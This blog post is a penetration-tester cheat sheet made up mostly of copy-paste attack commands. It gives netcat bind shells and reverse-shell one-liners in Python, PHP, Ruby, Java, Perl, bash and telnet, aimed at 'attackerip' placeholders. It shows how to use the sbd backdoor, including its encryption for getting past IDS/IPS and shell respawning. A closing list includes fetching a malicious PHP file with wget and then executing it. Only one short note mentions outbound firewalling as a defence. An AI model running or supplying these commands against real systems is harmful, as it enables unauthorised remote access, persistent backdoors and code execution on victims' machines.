Linux Hackers Command Reference


Linux Command Reference for Pen-testers

This part of the blog is dedicated to Linux and Unix-like commands that can be used from Penetration Testers (yea who is your tester?) and Information Security Administrators. In this page I will periodically post Linux tiny simple scripts and commands that a Penetration tester or a Security Administrator can use to:

1. Perform Administration Security tasks (e.g use windows/linux netcat to bind shells e.t.c).
2. Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).
3. Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c).

Using Netcat to Bind Shell

Launching a listening shell in windows and binding from linux:
  1. nc.exe -L -p <listening port> -e cmd.exe - Running in windows box
  2. nc <windows box ip> <windows port> - Run in Linux/Unix-like box
 Launching a listening shell in Linux/Unix-like and binding from Windows:
  1. nc -l -p <listening port> -e /bin/sh - Running in Linux/Unix-like box
  2. nc.exe <linux box ip> <linux port> - Run in Windows box
Using Netcat to transfer files

This can be used to transfer types of files from Linux to windows:
  1. nc.exe -lvvp 4444 > output.txt - Running in the Linux/Unix-like box
  2. cat input.txt | nc.exe -vv 192.168.8.74 4444 - Run in Windows box
This can be used to transfer all type of files from windows to Linux: 
  1. nc.exe -lvvp 4444 > output.exe - Running in the Linux box
  2. type input.exe | nc -vv <windows box ip> 4444 - Run in Windows box
Note: You might want to run a file command to identify the type of the file you want to transfer.  There is no difference between transferring binary and text files (most of the time).  

Using Netcat for port scanning
  1. nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box
  2. nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box
Note: The "-n" parameter here prevents DNS lookup, "-z" makes nc not receive any data from the server, and "-w 1" makes the connection timeout after 1 second of inactivity. The commands above will scan from port 1 to 1000.

Using Python to get shell

This was tested under Linux / Python 2.7: 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using PHP to get shell

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Using Ruby to get shell

This shell binds a shell in port 1234 (good for installed ruby in the victim machine):

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Using Java to get shell  

The following command opens a listening shell in 10.0.0.1:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Using Perl to get shell

And a shorter Perl reverse shell that does not depend on /bin/sh:
 

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 

If the target system is running Windows use the following one-liner:
 

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Alternatives to Bash Shell

Here are some tricks taken from Dameles blog to play with.

     exec /bin/bash 0&0 2>&0

Or:

    0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

    exec 5<>/dev/tcp/attackerip/4444
    cat <&5 | while read line; do $line 2>&5 >&5; done  # or:
    while read line 0<&5; do $line 2>&5 >&5; done


Using Telnet to get shell

 Of course, you can also use Telnet as an alternative for Netcat:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

Or:

 telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 

Note: Remember to listen on your machine also on port 4445/tcp

Using sbd to get shell

An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://www.cycom.se/dl/sbd. It is described as a ‘Netcat- clone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux.   
  1. Command with no encryption for listening in Windows: sbd.exe –l –p 5555 –c off
  2. Command with encryption for listening in Windows: sbd.exe –l –p 5555 –c on
  3. Binding a shell to Windows machine with encryption:  sbd.exe –l –p 5555 –c on –e cmd.exe
  4. Binding a shell to Windows machine with encryption:  sbd.exe –l –p 5555 –c off –e cmd.exe
  5. Command with no encryption for connecting to Windows from Linux: sbd 192.168.11.21 5555 –c off
  6. Command with encryption for connecting to Windows with Linux: sbd 192.168.1.21 5555 –c on 
  7. This command will monitor traffic at the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
  8. This command will cause a port forwarding: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000 
  9. This command will do perform a connection forwarding: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80  
Note: The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker. 

Using sbd to transfer file
  1. For file receiving in Windows the command is: sbd.exe –l –p 5555  > output.txt
  2. For file sending in Linux the command is: cat input.txt | sbd 192.168.11.21 5555
Note: There is not difference in transferring an executable or simply a text file.

Using sbd to respawn the shell

Another interesting feature of sbd if the -r option that allows you to respawn the shell. From the moment the client disconnects, the server side will exit. In order to respawn the server, specify the -r seconds’ switch. The server will be listening a gain after the specified amount of time. This might prevent the backdoor from existing and prevent to reconnect. Specifying a time of 0 seconds, will respawn the server immediately.

Here is a typical interaction with sbd respawning the shell after the connection is droped:

sbd -r 8 f -P server -l -p 100
demolisher: test1
demolisher: test2

sbd -P demolisher 127.0.0.1 100
test1
^C

sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED

sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
... after 8 seconds ....

sbd -P demolisher 127.0.0.1 100
test2     

After evaluating (or playing in other words), the tool seems very useful and easy to use. It contains (much) less features than netcat, although it offers build-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior, if used on well-known ports.

Useful commands for copy paste
  1. nc &lt;attacker_ip&gt; &lt;port&gt; -e /bin/bash
  2. mknod backpipe p; nc &lt;attacker_ip&gt; &lt;port&gt; 0&lt;backpipe | /bin/bash 1&gt;backpipe
  3. /bin/bash -i &gt; /dev/tcp/&lt;attacker_ip&gt;/&lt;port&gt; 0&lt;&1 2&gt;&1
  4. mknod backpipe p; telnet &lt;attacker_ip&gt; &lt;port&gt; 0&lt;backpipe | /bin/bash 1&gt;backpipe
  5. telnet &lt;attacker_ip&gt; &lt;1st_port&gt; | /bin/bash | telnet &lt;attacker_ip&gt; &lt;2nd_port&gt;
  6. wget -O /tmp/bd.php &lt;url_to_malicious_file&gt; && php -f /tmp/bd.php

References:
  1. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  2. http://en.wikipedia.org/wiki/Netcat#Port_scanning
  3. http://bernardodamele.blogspot.co.uk/2011/09/reverse-shells-one-liners.html